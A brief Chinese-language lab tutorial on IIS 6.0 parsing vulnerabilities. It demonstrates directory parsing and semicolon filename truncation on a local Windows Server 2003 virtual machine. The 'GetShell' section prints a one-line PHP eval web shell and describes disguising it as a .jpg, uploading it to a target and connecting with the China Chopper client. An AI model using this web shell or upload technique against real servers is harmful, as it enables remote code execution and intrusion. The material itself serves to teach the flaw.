IIS解析漏洞
一、目录解析
在网站下建立文件夹的名字为,asp或者.asa的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。
启动Windows Server 2003 Enterprise Edition
打开默认网站,新建1.asp,在里面再新建1.txt,写入一段代码“<%=now%>”
使用物理机访问192.168.188.129/1.asp/1.txt
二、畸形文件解析
在IIS 6处理文件解析时,分号可以起到截断的效果。也就是说shell..asp;jpg会被服务器看成是shell.asp。另外lS 6.0默认的可执行文件除了asp还包含asa\cer\cdx
打开默认网站,新建1.asp;.jpg
使用物理机访问
三、GetShell
将PHP一句话木马写到shell.php并更改后缀为shell.jpg上传到目标站点利用解析漏洞进行访问
一句话木马
<?php @eval($_POST['pass']);?>
访问
用中国菜刀连接
